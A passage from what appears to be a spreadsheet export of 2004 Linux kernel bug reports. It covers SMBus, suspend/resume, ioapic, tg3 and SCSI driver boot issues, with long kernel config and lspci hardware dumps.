CONFIG_NLS_CODEPAGE_860=y CONFIG_NLS_CODEPAGE_861=y CONFIG_NLS_CODEPAGE_862=y CONFIG_NLS_CODEPAGE_863=y CONFIG_NLS_CODEPAGE_864=y CONFIG_NLS_CODEPAGE_865=y CONFIG_NLS_CODEPAGE_866=y CONFIG_NLS_CODEPAGE_869=y CONFIG_NLS_CODEPAGE_936=y CONFIG_NLS_CODEPAGE_950=y CONFIG_NLS_CODEPAGE_932=y CONFIG_NLS_CODEPAGE_949=y CONFIG_NLS_CODEPAGE_874=y CONFIG_NLS_ISO8859_8=y CONFIG_NLS_CODEPAGE_1250=y CONFIG_NLS_CODEPAGE_1251=y CONFIG_NLS_ISO8859_1=y CONFIG_NLS_ISO8859_2=y CONFIG_NLS_ISO8859_3=y CONFIG_NLS_ISO8859_4=y CONFIG_NLS_ISO8859_5=y CONFIG_NLS_ISO8859_6=y CONFIG_NLS_ISO8859_7=y CONFIG_NLS_ISO8859_9=y CONFIG_NLS_ISO8859_13=y CONFIG_NLS_ISO8859_14=y CONFIG_NLS_ISO8859_15=y CONFIG_NLS_KOI8_R=y CONFIG_NLS_KOI8_U=y CONFIG_NLS_UTF8=y # # Profiling support # # CONFIG_PROFILING is not set # # Kernel hacking # # CONFIG_DEBUG_KERNEL is not set CONFIG_EARLY_PRINTK=y # CONFIG_DEBUG_SPINLOCK_SLEEP is not set # CONFIG_FRAME_POINTER is not set # CONFIG_4KSTACKS is not set CONFIG_X86_FIND_SMP_CONFIG=y CONFIG_X86_MPPARSE=y # # Security options # # CONFIG_SECURITY is not set # # Cryptographic options # CONFIG_CRYPTO=y # CONFIG_CRYPTO_HMAC is not set CONFIG_CRYPTO_NULL=y CONFIG_CRYPTO_MD4=y CONFIG_CRYPTO_MD5=y CONFIG_CRYPTO_SHA1=y CONFIG_CRYPTO_SHA256=y CONFIG_CRYPTO_SHA512=y CONFIG_CRYPTO_DES=y CONFIG_CRYPTO_BLOWFISH=y CONFIG_CRYPTO_TWOFISH=y CONFIG_CRYPTO_SERPENT=y CONFIG_CRYPTO_AES=y CONFIG_CRYPTO_CAST5=y CONFIG_CRYPTO_CAST6=y CONFIG_CRYPTO_ARC4=y CONFIG_CRYPTO_DEFLATE=y # CONFIG_CRYPTO_MICHAEL_MIC is not set # CONFIG_CRYPTO_CRC32C is not set # CONFIG_CRYPTO_TEST is not set # # Library routines # CONFIG_CRC32=y # CONFIG_LIBCRC32C is not set CONFIG_ZLIB_INFLATE=y CONFIG_ZLIB_DEFLATE=y CONFIG_X86_BIOS_REBOOT=y CONFIG_X86_STD_RESOURCES=y CONFIG_PC=y</t>
  </si>
  <si>
    <t>Asus BIOS doesn't activate ICH4 SMBus device</t>
  </si>
  <si>
    <t>2004-06-28 17:05 UTC</t>
  </si>
  <si>
    <t>2004-08-04 11:13 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sid Hardware Environment: Asus M2N laptop Problem Description: The bios doesn't activate the SMBus device. The problem is described here: http://www2.lm-sensors.nu/~lm78/cvs/lm_sensors2/prog/hotplug/README.p4b There's a 2.4 kernel module to solve this but I guess a workaround in the kernel would be nice.</t>
  </si>
  <si>
    <t>After suspend new processes get old start time</t>
  </si>
  <si>
    <t>2004-06-29 00:56 UTC</t>
  </si>
  <si>
    <t>Hamish Marson</t>
  </si>
  <si>
    <t>2005-12-21 12:22 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: IBM Thinkpad r50p Software Environment: Problem Description: Steps to reproduce:</t>
  </si>
  <si>
    <t>no suspend/resume support for ioapic</t>
  </si>
  <si>
    <t>2004-06-29 03:58 UTC</t>
  </si>
  <si>
    <t>2005-01-30 17:31 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: Thinkpad X40 Problem Description: ACPI resume fails with ioapic enabled since there's no suspend/resume support and the hardware doesn't reinitialise it. Steps to reproduce: Suspend/resume hardware that is using an ioapic</t>
  </si>
  <si>
    <t>All</t>
  </si>
  <si>
    <t>2.6.5-1.358</t>
  </si>
  <si>
    <t>(net tg3) driver lacks state 4 suspend</t>
  </si>
  <si>
    <t>2004-06-30 09:53 UTC</t>
  </si>
  <si>
    <t>the_nihilant</t>
  </si>
  <si>
    <t>2006-03-08 15:38 UTC</t>
  </si>
  <si>
    <t>Problem Description: tg3 driver lacks state4 suspend, so it is impossible to do swsuspend while tg3 driver is inserted. Steps to reproduce: echo 4 &gt; /proc/acpi/sleep while tg3 driver running</t>
  </si>
  <si>
    <t>EBDA region doen't be reserved which cause scan RSDP failed</t>
  </si>
  <si>
    <t>2004-06-30 21:26 UTC</t>
  </si>
  <si>
    <t>2004-10-17 20:17 UTC</t>
  </si>
  <si>
    <t>&gt;From: Andrew Morton [mailto:akpm@osdl.org] &gt;Sent: Monday, June 28, 2004 5:35 PM &gt;To: linux-acpi &gt;Subject: current ACPI tree still broken &gt; &gt; &gt;USB comes up dead on my Dell workstation. Reverting the current ACPI tree &gt;fixes it up. &gt; &gt;See &gt; &gt;http://www.zip.com.au/~akpm/linux/patches/stuff/dmesg.good &gt; &gt;versus &gt; &gt;http://www.zip.com.au/~akpm/linux/patches/stuff/dmesg.bad</t>
  </si>
  <si>
    <t>Since the update of sym-2.1.18i to sym-2.1.18j in 2.6.6, the kernel stops booting</t>
  </si>
  <si>
    <t>2.6.6 and higher</t>
  </si>
  <si>
    <t>2004-07-01 06:38 UTC</t>
  </si>
  <si>
    <t>Lyon Lemmens</t>
  </si>
  <si>
    <t>Distribution: SourceMage GNU Linux Hardware Environment: ** /proc/cpuinfo: processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 8 model name : Pentium III (Coppermine) stepping : 6 cpu MHz : 1004.541 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse bogomips : 1978.36 processor : 1 vendor_id : GenuineIntel cpu family : 6 model : 8 model name : Pentium III (Coppermine) stepping : 6 cpu MHz : 1004.541 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse bogomips : 2007.04 ** lspci -vvv: 00:00.0 Host bridge: VIA Technologies, Inc. VT82C693A/694x [Apollo PRO133x] (rev c4) Subsystem: Asustek Computer, Inc.: Unknown device 8038 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Region 0: Memory at f8000000 (32-bit, prefetchable) [size=64M] Capabilities: &lt;available only to root&gt; 00:01.0 PCI bridge: VIA Technologies, Inc. VT82C598/694x [Apollo MVP3/Pro133x AGP] (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000e000-0000dfff Memory behind bridge: de000000-dfdfffff Prefetchable memory behind bridge: dff00000-f7ffffff BridgeCtl: Parity- SERR- NoISA- VGA+ MAbort- &gt;Reset- FastB2B- Capabilities: &lt;available only to root&gt; 00:04.0 ISA bridge: VIA Technologies, Inc. VT82C686 [Apollo Super South] (rev 40) Subsystem: Asustek Computer, Inc.: Unknown device 8038 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: &lt;available only to root&gt; 00:04.1 IDE interface: VIA Technologies, Inc. VT82C586/B/686A/B PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Region 4: I/O ports at d800 [size=16] Capabilities: &lt;available only to root&gt; 00:04.2 USB Controller: VIA Technologies, Inc. USB (rev 16) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. (Wrong ID) USB Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, cache line size 08 Interrupt: pin D routed to IRQ 11 Region 4: I/O ports at d400 [size=32] Capabilities: &lt;available only to root&gt; 00:04.3 USB Controller: VIA Technologies, Inc. USB (rev 16) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. (Wrong ID) USB Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, cache line size 08 Interrupt: pin D routed to IRQ 11 Region 4: I/O ports at d000 [size=32] Capabilities: &lt;available only to root&gt; 00:04.4 Host bridge: VIA Technologies, Inc. VT82C686 [Apollo Super ACPI] (rev 40) Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin ? routed to IRQ 9 Capabilities: &lt;available only to root&gt; 00:07.0 Ethernet controller: Intel Corp. 82557/8/9 [Ethernet Pro 100] (rev 08) Subsystem: Intel Corp. EtherExpress PRO/100+ Management Adapter Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (2000ns min, 14000ns max), cache line size 08 Interrupt: pin A routed to IRQ 17 Region 0: Memory at dd800000 (32-bit, non-prefetchable) [size=4K] Region 1: I/O ports at b800 [size=64] Region 2: Memory at dd000000 (32-bit, non-prefetchable) [size=1M] Capabilities: &lt;available only to root&gt; 00:08.0 SCSI storage controller: LSI Logic / Symbios Logic 53c1010 Ultra3 SCSI Adapter (rev 01) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 72 (4250ns min, 4500ns max), cache line size 08 Interrupt: pin A routed to IRQ 19 Region 0: I/O ports at b400 [size=256] Region 1: Memory at dc800000 (64-bit, non-prefetchable) [size=1K] Region 3: Memory at dc000000 (64-bit, non-prefetchable) [size=8K] Capabilities: &lt;available only to root&gt; 00:08.1 SCSI storage controller: LSI Logic / Symbios Logic 53c1010 Ultra3 SCSI Adapter (rev 01) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 72 (4250ns min, 4500ns max), cache line size 08 Interrupt: pin B routed to IRQ 16 Region 0: I/O ports at b000 [size=256] Region 1: Memory at db800000 (64-bit, non-prefetchable) [size=1K] Region 3: Memory at db000000 (64-bit, non-prefetchable) [size=8K] Capabilities: &lt;available only to root&gt; 00:09.0 Multimedia audio controller: Creative Labs SB Live! EMU10k1 (rev 04) Subsystem: Creative Labs CT4620 SBLive! Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (500ns min, 5000ns max) Interrupt: pin A routed to IRQ 19 Region 0: I/O ports at a800 [size=32] Capabilities: &lt;available only to root&gt; 00:09.1 Input device controller: Creative Labs SB Live! MIDI/Game Port (rev 01) Subsystem: Creative Labs Gameport Joystick Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Region 0: I/O ports at a400 [size=8] Capabilities: &lt;available only to root&gt; 00:0b.0 Ethernet controller: 3Com Corporation 3c905 100BaseTX [Boomerang] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (750ns min, 2000ns max) Interrupt: pin A routed to IRQ 17 Region 0: I/O ports at a000 [size=64] Expansion ROM at &lt;unassigned&gt; [disabled] [size=64K] 01:00.0 VGA compatible controller: nVidia Corporation: Unknown device 0342 (rev a1) (prog-if 00 [VGA]) Subsystem: Asustek Computer, Inc.: Unknown device 8158 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 248 (1250ns min, 250ns max) Interrupt: pin A routed to IRQ 16 Region 0: Memory at de000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at e0000000 (32-bit, prefetchable) [size=256M] Expansion ROM at dffe0000 [disabled] [size=128K] Capabilities: &lt;available only to root&gt; ** /proc/scsi/scsi: Attached devices: Host: scsi0 Channel: 00 Id: 06 Lun: 00 Vendor: IBM Model: DDYS-T18350N Rev: S96H Type: Direct-Access ANSI SCSI revision: 03 Host: scsi0 Channel: 00 Id: 10 Lun: 00 Vendor: QUANTUM Model: ATLAS_V_36_WLS Rev: 0230 Type: Direct-Access ANSI SCSI revision: 03 Software Environment: ** uname -a Linux obelix 2.6.5 #1 SMP Thu Apr 15 21:14:03 CEST 2004 i686 unknown unknown GNU/Linux ** kernel config: # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y CONFIG_CLEAN_COMPILE=y CONFIG_STANDALONE=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_POSIX_MQUEUE=y CONFIG_BSD_PROCESS_ACCT=y CONFIG_SYSCTL=y # CONFIG_AUDIT is not set CONFIG_LOG_BUF_SHIFT=15 CONFIG_HOTPLUG=y CONFIG_IKCONFIG=y CONFIG_IKCONFIG_PROC=y # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y # CONFIG_KALLSYMS_ALL is not set CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_IOSCHED_CFQ=y # CONFIG_CC_OPTIMIZE_FOR_SIZE is not set # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y # CONFIG_MODULE_FORCE_UNLOAD is not set CONFIG_OBSOLETE_MODPARM=y CONFIG_MODVERSIONS=y CONFIG_KMOD=y CONFIG_STOP_MACHINE=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_ELAN is not set # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set CONFIG_MPENTIUMIII=y # CONFIG_MPENTIUMM is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set # CONFIG_MK7 is not set # CONFIG_MK8 is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set # CONFIG_X86_GENERIC is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=5 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_HPET_TIMER=y CONFIG_HPET_EMULATE_RTC=y CONFIG_SMP=y CONFIG_NR_CPUS=4 # CONFIG_SCHED_SMT is not set CONFIG_PREEMPT=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y # CONFIG_X86_MCE_NONFATAL is not set # CONFIG_X86_MCE_P4THERMAL is not set # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set CONFIG_X86_MSR=y CONFIG_X86_CPUID=y # # Firmware Drivers # # CONFIG_EDD is not set # CONFIG_NOHIGHMEM is not set CONFIG_HIGHMEM4G=y # CONFIG_HIGHMEM64G is not set CONFIG_HIGHMEM=y # CONFIG_HIGHPTE is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y # CONFIG_EFI is not set CONFIG_IRQBALANCE=y CONFIG_HAVE_DEC_LOCK=y # CONFIG_REGPARM is not set # # Power management options (ACPI, APM) # CONFIG_PM=y # CONFIG_SOFTWARE_SUSPEND is not set # CONFIG_PM_DISK is not set # # ACPI (Advanced Configuration and Power Interface) Support # CONFIG_ACPI=y CONFIG_ACPI_BOOT=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_SLEEP=y CONFIG_ACPI_SLEEP_PROC_FS=y CONFIG_ACPI_AC=m CONFIG_ACPI_BATTERY=m CONFIG_ACPI_BUTTON=m CONFIG_ACPI_FAN=m CONFIG_ACPI_PROCESSOR=m CONFIG_ACPI_THERMAL=m # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_TOSHIBA is not set # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_BUS=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y # CONFIG_X86_PM_TIMER is not set # # APM (Advanced Power Management) BIOS Support # # CONFIG_APM is not set # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GOMMCONFIG is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_MMCONFIG=y # CONFIG_PCI_USE_VECTOR is not set # CONFIG_PCI_LEGACY_PROC is not set CONFIG_PCI_NAMES=y CONFIG_ISA=y # CONFIG_EISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set # # PCMCIA/CardBus support # # CONFIG_PCMCIA is not set CONFIG_PCMCIA_PROBE=y # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=m CONFIG_BINFMT_MISC=m # # Device Drivers # # # Generic Driver Options # CONFIG_FW_LOADER=m # CONFIG_DEBUG_DRIVER is not set # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=m CONFIG_PARPORT_PC=m CONFIG_PARPORT_PC_CML1=m # CONFIG_PARPORT_SERIAL is not set CONFIG_PARPORT_PC_FIFO=y CONFIG_PARPORT_PC_SUPERIO=y CONFIG_PARPORT_OTHER=y CONFIG_PARPORT_1284=y # # Plug and Play support # CONFIG_PNP=y # CONFIG_PNP_DEBUG is not set # # Protocols # CONFIG_ISAPNP=y CONFIG_PNPBIOS=y # CONFIG_PNPBIOS_PROC_FS is not set # # Block devices # CONFIG_BLK_DEV_FD=m # CONFIG_BLK_DEV_XD is not set # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set CONFIG_BLK_DEV_LOOP=y # CONFIG_BLK_DEV_CRYPTOLOOP is not set # CONFIG_BLK_DEV_NBD is not set # CONFIG_BLK_DEV_CARMEL is not set CONFIG_BLK_DEV_RAM=m CONFIG_BLK_DEV_RAM_SIZE=4096 # CONFIG_LBD is not set # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y CONFIG_BLK_DEV_IDECD=y CONFIG_BLK_DEV_IDETAPE=m CONFIG_BLK_DEV_IDEFLOPPY=m CONFIG_BLK_DEV_IDESCSI=m # CONFIG_IDE_TASK_IOCTL is not set # CONFIG_IDE_TASKFILE_IO is not set # # IDE chipset support/bugfixes # CONFIG_IDE_GENERIC=y CONFIG_BLK_DEV_CMD640=y CONFIG_BLK_DEV_CMD640_ENHANCED=y CONFIG_BLK_DEV_IDEPNP=y CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=y CONFIG_BLK_DEV_OPTI621=m CONFIG_BLK_DEV_RZ1000=m CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_ADMA=y CONFIG_BLK_DEV_AEC62XX=m CONFIG_BLK_DEV_ALI15X3=m # CONFIG_WDC_ALI15X3 is not set CONFIG_BLK_DEV_AMD74XX=m # CONFIG_BLK_DEV_ATIIXP is not set CONFIG_BLK_DEV_CMD64X=m CONFIG_BLK_DEV_TRIFLEX=m CONFIG_BLK_DEV_CY82C693=m CONFIG_BLK_DEV_CS5520=m CONFIG_BLK_DEV_CS5530=m CONFIG_BLK_DEV_HPT34X=m # CONFIG_HPT34X_AUTODMA is not set CONFIG_BLK_DEV_HPT366=m CONFIG_BLK_DEV_SC1200=m CONFIG_BLK_DEV_PIIX=m CONFIG_BLK_DEV_NS87415=m CONFIG_BLK_DEV_PDC202XX_OLD=m # CONFIG_PDC202XX_BURST is not set CONFIG_BLK_DEV_PDC202XX_NEW=m # CONFIG_PDC202XX_FORCE is not set CONFIG_BLK_DEV_SVWKS=m CONFIG_BLK_DEV_SIIMAGE=m CONFIG_BLK_DEV_SIS5513=m CONFIG_BLK_DEV_SLC90E66=m CONFIG_BLK_DEV_TRM290=m CONFIG_BLK_DEV_VIA82CXXX=y # CONFIG_IDE_ARM is not set # CONFIG_IDE_CHIPSETS is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set CONFIG_IDEDMA_AUTO=y # CONFIG_BLK_DEV_HD is not set # # SCSI device support # CONFIG_SCSI=y CONFIG_SCSI_PROC_FS=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=y CONFIG_CHR_DEV_ST=m # CONFIG_CHR_DEV_OSST is not set CONFIG_BLK_DEV_SR=m # CONFIG_BLK_DEV_SR_VENDOR is not set CONFIG_CHR_DEV_SG=m # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # CONFIG_SCSI_MULTI_LUN=y CONFIG_SCSI_CONSTANTS=y CONFIG_SCSI_LOGGING=y # # SCSI Transport Attributes # CONFIG_SCSI_SPI_ATTRS=y # CONFIG_SCSI_FC_ATTRS is not set # # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_7000FASST is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AHA152X is not set # CONFIG_SCSI_AHA1542 is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_DPT_I2O is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_IN2000 is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_SATA is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_DTC3280 is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_GENERIC_NCR5380 is not set # CONFIG_SCSI_GENERIC_NCR5380_MMIO is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_NCR53C406A is not set CONFIG_SCSI_SYM53C8XX_2=y CONFIG_SCSI_SYM53C8XX_DMA_ADDRESSING_MODE=0 CONFIG_SCSI_SYM53C8XX_DEFAULT_TAGS=16 CONFIG_SCSI_SYM53C8XX_MAX_TAGS=64 # CONFIG_SCSI_SYM53C8XX_IOMAPPED is not set # CONFIG_SCSI_IPR is not set # CONFIG_SCSI_PAS16 is not set # CONFIG_SCSI_PSI240I is not set # CONFIG_SCSI_QLOGIC_FAS is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set CONFIG_SCSI_QLA2XXX=y # CONFIG_SCSI_QLA21XX is not set # CONFIG_SCSI_QLA22XX is not set # CONFIG_SCSI_QLA2300 is not set # CONFIG_SCSI_QLA2322 is not set # CONFIG_SCSI_QLA6312 is not set # CONFIG_SCSI_QLA6322 is not set # CONFIG_SCSI_SYM53C416 is not set # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_T128 is not set # CONFIG_SCSI_U14_34F is not set # CONFIG_SCSI_ULTRASTOR is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # # Old CD-ROM drivers (not SCSI, not IDE) # # CONFIG_CD_NO_IDESCSI is not set # # Multi-device support (RAID and LVM) # CONFIG_MD=y # CONFIG_BLK_DEV_MD is not set CONFIG_BLK_DEV_DM=m # CONFIG_DM_CRYPT is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support # # CONFIG_IEEE1394 is not set # # I2O device support # CONFIG_I2O=m # CONFIG_I2O_CONFIG is not set CONFIG_I2O_BLOCK=m CONFIG_I2O_SCSI=m CONFIG_I2O_PROC=m # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y CONFIG_PACKET_MMAP=y # CONFIG_NETLINK_DEV is not set CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y # CONFIG_IP_MULTICAST is not set # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set CONFIG_NET_IPIP=m # CONFIG_NET_IPGRE is not set # CONFIG_ARPD is not set CONFIG_SYN_COOKIES=y # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_INET_IPCOMP is not set # # IP: Virtual Server Configuration # # CONFIG_IP_VS is not set # CONFIG_IPV6 is not set CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=m CONFIG_IP_NF_FTP=m CONFIG_IP_NF_IRC=m CONFIG_IP_NF_TFTP=m CONFIG_IP_NF_AMANDA=m # CONFIG_IP_NF_QUEUE is not set CONFIG_IP_NF_IPTABLES=m CONFIG_IP_NF_MATCH_LIMIT=m # CONFIG_IP_NF_MATCH_IPRANGE is not set CONFIG_IP_NF_MATCH_MAC=m CONFIG_IP_NF_MATCH_PKTTYPE=m CONFIG_IP_NF_MATCH_MARK=m CONFIG_IP_NF_MATCH_MULTIPORT=m CONFIG_IP_NF_MATCH_TOS=m 